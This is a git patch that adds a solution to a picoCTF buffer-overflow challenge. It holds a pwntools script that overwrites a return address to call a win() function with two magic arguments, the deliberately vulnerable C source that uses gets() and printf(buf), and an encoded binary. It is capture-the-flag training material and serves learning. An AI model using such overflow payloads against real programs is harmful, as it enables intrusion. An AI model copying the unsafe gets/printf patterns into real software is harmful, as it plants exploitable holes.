From c56300256d0bcc30547e07d9a1eacf821697461d Mon Sep 17 00:00:00 2001
From: h7x4 <h7x4@nani.wtf>
Date: Tue, 3 Sep 2024 19:46:13 +0200
Subject: [PATCH] pwn/buffer_overflow_2

---
 pwn/buffer_overflow_2/solve.py |  31 ++++++++++++++++++++++++
 pwn/buffer_overflow_2/vuln     | Bin 0 -> 15808 bytes
 pwn/buffer_overflow_2/vuln.c   |  43 +++++++++++++++++++++++++++++++++
 3 files changed, 74 insertions(+)
 create mode 100755 pwn/buffer_overflow_2/solve.py
 create mode 100755 pwn/buffer_overflow_2/vuln
 create mode 100644 pwn/buffer_overflow_2/vuln.c

diff --git a/pwn/buffer_overflow_2/solve.py b/pwn/buffer_overflow_2/solve.py
new file mode 100755
index 0000000..b3dab5e
--- /dev/null
+++ b/pwn/buffer_overflow_2/solve.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -p python3 -i python3 python3Packages.pwntools
+
+from pwn import *
+
+exe = ELF("./vuln")
+
+context.binary = exe
+
+ADDR, PORT, *_ = "saturn.picoctf.net 55214".split()
+
+def conn():
+    if args.REMOTE:
+        r = remote(ADDR, PORT)
+    else:
+        r = process([exe.path])
+
+    return r
+
+def main():
+  r = conn()
+
+  print(r.recvuntil(b"Please enter your string:"))
+  offset = 112 # found with pwndbg
+  payload = b'A' * offset + p32(exe.sym.win) + b'B'*4 + p32(0xCAFEF00D) + p32(0xF00DF00D)
+  r.sendline(payload)
+  print(r.recvall())
+  r.close()
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/pwn/buffer_overflow_2/vuln b/pwn/buffer_overflow_2/vuln
new file mode 100755
index 0000000000000000000000000000000000000000..accb967c62baf9a39e56548a7ce13c01279497fa
GIT binary patch
literal 15808
zcmb<-^>JflWMqH=CI)5(5U*h(3x^2<1H%goh>Qt?0s{|&27^3<90MBz0|Q9Tq=AJ4
zgc}$c7(keXfq?;pnHd-uwlFd<Y-wcS0AXPU1_lrY$$`uUVX&zUEF26CEF38;3=AL)
zl4lTL0NW3u878oBfN%>70|N-Nf;7S86&M&87O-%Dum=+Z0|+DQ=g?<h;MmW?0m3GX
z3=9^G3}API%w=L=U=Yw}U=Y~P!U4iBK>lQa$b-xP;S-Du3?~{{I6ydofq?;pLE<1B
z{In$H4I=}?n?@E65SC$JU;tr|90&(IElFumU|?uiz`_B-F$@e0APkZN;lQUQDIl+)
zV^FvXFfcF#JuOK=cK;6s1_lrY=>>(IeokhReol&RPG(+dg<f&Ko)IM6MHm<uKw<Ch
z7s{|ib5*PE#z5IO_KeOq?V{xxp4@N+>E~f!U;u?9NDUJM!vT;ONDqhx*$pxuBnNUE
zNE{SaAU25RWq`yDNI!!D11JU<Kw@jXA0GgzLB?8093ch<1|u}SAsXKUjjxKvuS4R4
zES5szgUpXW;|HMe<<a=&NPIyC1_nDMKFB<7P+DHV!T|~wK?XqvhMdf#WKdX}F~ocN
z#}}8RWah<}7N@2#q*i2>Fr?)dq~<Xcl$I1T6clCVm83DGrKgq@GZdGk<d>E(6sMLH
zr52}WrZA+ZmZXB{;?$C|q|!8o_;`@P@x>*HMJ4gMiJ5r}?mnJQ&hbWihH#bvLwtOC
zZhjtARXoV4Objr{0A(?QX;AzzGBAPj5GX!DY6UYhc|j>73zY6b7|ds4C;>@=($;<!
z4mLIhhCd*hn}LDn01F2@BLjl~h-PA75CPH53=9$=nuUQu21K(mFerd%b_NC&5Y55B
zpaG&e85ndxG#3Md0f+`AIH*0N)MyBdhQMeDjE2By2#kinXb6mkz-S1JhQPpvz-NBB
z-@(mqI9?oPWMF7K{8^uYp}YCV|NsA650o(dztDVyBl<A13;&z49AM%2ugY<Ng@a$-
zfdQmH1Ek>PqyPW^r%eF!IT#oiUS2}*K^>8ohY)-Tko+bDAJn0Hxd_460Lf26@C`ux
zCIlZeCh@We!FK@3Cn5Nt&g9D=IRC#Ys7I5=FYm$tcJF^xP|pUL59;9{^FciwWIm|J
zgUko@e31E|9uP7g)DuGHgL*{Bd{EB_!8d#x*ZHvd$%lZDpcl#vplHa^V_@iQPPp>_
ze?V{Zhs*!}2Ly&4KTtH8g(Kia*Z=?jzjVu}98Q~%HUS*oU>1m%Hemux0>Vw3u*2p6
z3x_R;C{ft~il^2CCDNgtPn+L}WPn6LQ7mxsaPJm1kYw5f7z-)@(XR_q*?H*T3;Bb;
zm>4fy{86H?3#7dDQi(X&EP()sVV9bZfD9{9V}O|hN)HWS`x#0h_Hw+)`2YX^F;<Y7
zjBuNg)xYin=?d+98r=LQ<b~G%|Nk2gN9i&!G{52KZRU6Y4iqjB^<v(?|Nonh2z0uB
zX|DakP^#7ZhNZVz7$nu(tO227LDY+{f58fy-|%EHys!Z2dc*R+^h=gQuj`h87vCYW
zjkO%SAO4*xm1?Zz;r+n-p;V;#4G&nsHi&}PEE8TcPUw#PbMi34g(WXK{()S$LkHwS
zo?h1}0WYRO)PuE833#y`!bRxp^-*DIe)8de;UADM1DoFnyl@5^Qmg~Ye}De}|KH7!
z#gN66#SrjfB}Dg&#J~UlgM12h`Tx={|4YBTSPPK@S=5{i_Ng~S<VE!V|Np@e-kbU(
zGCH<5@eeqefZhEf8<fh9vgt4|gogz;zv1b8-Cd)i@#6jO|NndE^8Ek*zqgg+|NsA*
zhY$W{D$z9j22BmUWem-4Si=98sOW(4l&v6D&Bqv<j|f<PE`8j5geN*KJ{A_2y(Mbk
z{C2ooM+H=ffb0gBHQ|3j0oJa~z<^P{fRfcH9u0xf5Eu=C(GVC7fzc2c4S~@R7!85Z
z5TH#6faZ8X^MyqWX*r4MdL<Pl4Eg1G3Mr{crRnLJdFcvZVJ?P%oYchPRE6ZC)Wnih
z1$D4!NkxgeLS~*qNk(R|LP};)YH~?_QKdq8W=V!ZWqxT9gKDvYYB5Y}YF<fd5m;QI
zxTGjEFWm~%?Pru`wg%1JaxpM4Y<U0w{~XX<`-lJk!4t|K|NjTgQ96A5|G$HQfkEuk
z|NmDQ7#MbZ`u`s^AO7jn|Nk<K3=9RI|NjqQWMFvk`Tzepj0_A<KmY%~fsug$G#?HM
zHO8tS2F4l=Mrj@vmJZOoCUm~O<-`B~)*uBg>>QvW3eYgah7bS$gXgyy7{C+UE({C|
zJn#Si-vCm_$Kl4u<HgTi!cxItFJ-A^q@o1U2O9sF@&5n+1t2w0eKiaW3|1fi|6c?W
zbLHb`Wpd(Wb!ld1ns)Rs4+{&}Y>@gLAOHWiLQ|6mQNjRn&k+U&hI1eP|E~h6@!(-(
z@DyNWDrIouXD+Q^6JTa4tzk+$$iv9sc-Zl%GY<<3Xy^kJHWHuy|4#+!0o(1v$J5U2
z$S2Uo;>ah`%<9aikjtmy$fx1Lr{ltB;LE4r&L`q{m`}j*7$1-0aXt>mqkJq3prsNF
zE{qHeHlGk-0`hMJBLjo(r~m&!bK@W@M)7C}jE2By2#kinXb6mkz-S1JhQMeDjE2By
z2n?kVm@tWjBViH?2W0&$0|R*3>I4=J(E8?_DJ&e443PEY(x7$03=9mQ^~XH>SvX+p
zzQ6wapRdux!U5_#YBaNOfYx$*G_i1i`nA0b3=E+4#Gt;DC^S$&{ceT>EF7S9)u6S?
zpuQ?-9kMtB1A|Bl3kQhJ(!#<4T8j+Q2U<T5npXe!|9}3KW){%ATRzCGAO8Q(-`30m
zl7gB{8U<Sa4%6W<frTSr0t-jN1Qw2h2`n596IeJVOkm+yFoA_*!vq$N0~1&{E`ZkL
zLp8WNJ6kDegeH~dm6R%2>Y3;n=o*%Sd4_dH26_f2dWM=1ai|6~3bZ!>Bm~)U09kJj
z;e$d2vc4X|2Zt5|M-#-K%-~%H3=E*~hRB0Loq+)q-Vi=0^cfgH@c`kogD3`AI59Io
zf(sOmAPHs$P7uWa3U3gDnE@1Qka&RbL9xfc0NRTH;e%5Lg8?)wn8B;y85kbG`FtQ{
z44^#}AO<r7KZs%gr6Ul78Qimm?q2|}*$2foWWNAJ9u(^g40k~L8^H3Q*oUM)h&(8@
zFff49AA}D{Rj{~ZW)K4jGyK>O3olTrVgRl72YZ~E0ki;vfx+YeOdgcF85lq_@*s`O
z;M5IbK`=9eG<ZEZgvY?Z!tn7wC<Go%gy?5t;Aa5&SYZ-^uLv5)LE?kf+k?yprCCM>
zDF!#txC+#Lj0~a-xuD=hQeO$pZy-Av8AKRnfEZ8=vL9p)lnZvxd<F&vmqif!8Ns_v
zV6qVRu0^sBG%~agv<@C_zZk=DB>O<}w-^xd!N4HI@D^koG`tuYBp8?(85k0#K=Qi~
z13!Z>BLl;QiIDvQLQMP&&5VffRbY^0&_r@DD0aiq_|}XJ45?Ef?g!})1npUw%)$X0
z8v>ahhNeCpG%f>mj{t)t11}>3Jbei<2{7cLsc%Gb4@i9<n*2N@K4@HSEfOE(-n}6A
zK<yJ`l4Ll=$iTpYv_Ik|n)+{y3=AJ8vv7dMpg`_tV`5;KHi?A;G#&=xb3w8=C{!6h
z=F6h-cQP<AI6&<aV31<a18r8B2n}y0euj3?o}-B@9H8+#ka=z({YdWd1@XbAGk|t)
zFvK$<(l^MwY$gT<(0UrsxEe@*0g^n(e>F(@LGEJ!@uB%!h>3@RA-SlexTG{KO)r@t
zCABCuJ+rtZwJ5$MH$FKhKQFbIAwE7OKR!JtKPfRMKBXkTs5m~cw1OcyKer$!wInq~
z&)m$&7`vkQw9LHB_{5^3#LD>8ypp0yhP0x@+|>A#(%jrihWL0SUVLU=W(kVYveKM9
zy<~>?c())&U)Ok7KbQD;hImwUDGc#0k$#T8p3bN;;7uqD@$v3{q4BOBP!l{{f*9i6
zef*sqed7Jy+=5+0;zJyrd|W}Mg14?D7ng!v%n%=6VPU41o>~%LkQ`r<QJR;nmsG(3
z*$(620Nd6A+RTEfu7CmLaLA?^6t$@-i6x1!T{9>$@gNz<mKgBH8&pY@{W72}I;heq
z#rg3WiFqkGsp#8zFgE0%YJ__k6!Hw^nR%eSJ)oUD$jZ_{yMYh_h79p3Iq^lQIr+(n
zC8;1Mmt-c#7i6X~#HSU+XOu&C2_ZCq!YHY@7^JeOgaN!OC_X;K*BKg}@ZChnIvDhd
zD|1T{lNj`hONt<L28@*n8hS5a(96p&N!3fwE7eOX&CE&B%}hZODk#b?NG&R<gbF!2
zdFqxVrZa$*XCxM9FzBUJ<`q}wLg<nrh)h{(QE_H|9ttPEh(WI?H3y^~!YIfoVbBAI
zmtH|miC%GPGJ{@8YDEcy9w?<V=oRIIqLM)`H3OQqGg68WJcw3EB8TXJu~RDZ5_2<?
z8T8WgOTYxkcm_R)VM)cs40_4=xw)x%pg9C+Q9zIaweLVh87RAh+9#lWjF8$Fq7@_u
zVu9A_fm#(Hb)Y?hp#6d>APFdjjg6ZzFfhQ>f%Xc5_6>sCj8J9JmJ9=fCz3i)I|tM-
z1eL?+>cSZq7{2}gpAWJZ)c(<6g3MDuT0Ee-4uTV*ZBCFnP`e1UKk@<84v-%}?gO<e
zGr{c(&>k{Kdr5<tfdSNBh1m;I3t|^CFfjaw+6!t&ZDWS)d4$;uvIm4g`}9C<R1h1~
zzPiH90G`JHg#pMcki8)DKz494K<ovzyI7#}4KVXS>OhT^X$%bD)|nHuT`a=FzyNA5
zgVcdqF)($Y`X6LINF3Zw6JTJ#79X>qdl*6LK<zgJ0R{%}+z!Z5pf&-teZLe*9jIOR
zK!AY(G+zT%25!ND!fzdtx`v4?91VgD3@<^RhbjcA0Wr5AsROkGb3_=RtuT-*B+fuA
z(7H;HKfp$S+J6cR44^Ot$$>D)zaaV$)I5+n&>mCJepApMQ;-}8!_-|sQU_{J-cev+
z$N^aZQUvuYhzV-%fZA}NmNsb5ENK5J%nXn`hz-Ke7#P5<S&%wV`;$i>;dW$opP>6`
zLFz#5QqX?e7tr(vQwNIQ-%$5~)PdToKS29-K?<N4WG4uN8lWI&gVcfgO`t>t+Jg*L
z2F^zyb)1ZlJ*psep!Tha0RyzP4^atH17h(rLc~GpK<!c+15|&2>;kD1ftm-Jiv#gN
z>a;-&C<dv6VNhH^g&8so7#J?FFfhn6Ffiys!x@woKxrOiCrq7%DFeeqB#j`mKysiS
T0kXQ2<_rw7FiB{bfz$y2vc+&Y

literal 0
HcmV?d00001

diff --git a/pwn/buffer_overflow_2/vuln.c b/pwn/buffer_overflow_2/vuln.c
new file mode 100644
index 0000000..60b8d31
--- /dev/null
+++ b/pwn/buffer_overflow_2/vuln.c
@@ -0,0 +1,43 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+
+#define BUFSIZE 100
+#define FLAGSIZE 64
+
+void win(unsigned int arg1, unsigned int arg2) {
+  char buf[FLAGSIZE];
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("%s %s", "Please create 'flag.txt' in this directory with your",
+                    "own debugging flag.\n");
+    exit(0);
+  }
+
+  fgets(buf,FLAGSIZE,f);
+  if (arg1 != 0xCAFEF00D)
+    return;
+  if (arg2 != 0xF00DF00D)
+    return;
+  printf(buf);
+}
+
+void vuln(){
+  char buf[BUFSIZE];
+  gets(buf);
+  puts(buf);
+}
+
+int main(int argc, char **argv){
+  setvbuf(stdout, NULL, _IONBF, 0);
+
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+
+  puts("Please enter your string: ");
+  vuln();
+  return 0;
+}
+